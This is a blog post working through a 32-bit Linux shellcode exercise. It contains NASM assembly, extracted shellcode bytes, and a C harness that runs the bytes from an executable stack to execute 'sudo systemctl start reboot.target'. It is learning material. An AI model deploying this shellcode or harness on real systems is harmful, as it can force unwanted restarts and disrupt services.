I recently started working on writing 32 bit shellcodes for linux . And I will be posting sample shellcodes i created for practicing over here in this blog. This is one of many shellcodes that i have written. This shell code utilizes systemd init system to reboot a system . lets jump in . you need to know how syscalls are called and a basic assembly-fu to understand this piece of code. code is self explanatory with comments.
systmctl_reboot.nasm
———————————————————————————————–
section .text
_start:
; clear out registers before use
xor eax, eax
xor edx,edx
; PUSH /usr////bin/sudo
push eax
push 0x6f647573
push 0x2f6e6962
push 0x2f2f2f2f
push 0x7273752f
; execve first argument
mov ebx, esp
; PUSH /bin///systemctl
push eax
push 0x6c74636d
push 0x65747379
push 0x732f2f2f
push 0x6e69622f
mov ecx,esp
; PUSH reboot.target
push eax
push byte 0x74
push 0x65677261
push 0x742e746f
push 0x6f626572
mov esi,esp
; PUSH start
push eax
push byte 0x74
push 0x72617473
mov edi,esp
; execve second argument
push eax
push esi
push edi
push ecx
push ebx
mov ecx,esp
; execve third argument
push eax
mov edx, esp
; mov 11 to eax (syscall for execve)
mov al, 11
; Call the interupt
int 0x80
assembling : nasm -f elf32 -o systmctl_reboot.o systmctl_reboot.nasm
linking : ld -z execstack -o systmctl_reboot systmctl_reboot.o
finally we can get the final machine code with the help of objdump,
objdump -d ./systmctl_reboot -M intel
final shellcode :
\x31\xc0\x31\xd2\x50\x68\x73\x75\x64\x6f\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x68\x6d\x63\x74\x6c\x68\x79\x73\x74\x65\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe1\x50\x6a\x74\x68\x61\x72\x67\x65\x68\x6f\x74\x2e\x74\x68\x72\x65\x62\x6f\x89\xe6\x50\x6a\x74\x68\x73\x74\x61\x72\x89\xe7\x50\x56\x57\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80
this can be used inside our template c program to trigger this shellcode.
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
“\x31\xc0\x31\xd2\x50\x68\x73\x75\x64\x6f\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x68\x6d\x63\x74\x6c\x68\x79\x73\x74\x65\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe1\x50\x6a\x74\x68\x61\x72\x67\x65\x68\x6f\x74\x2e\x74\x68\x72\x65\x62\x6f\x89\xe6\x50\x6a\x74\x68\x73\x74\x61\x72\x89\xe7\x50\x56\x57\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80”;
main()
{
printf(“Shellcode Length: %d\n”, strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
compile with no stack protection and exec stack flags.
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
./shellcode
This should trigger a system restart if nopasswd has been set to execute sudo commands.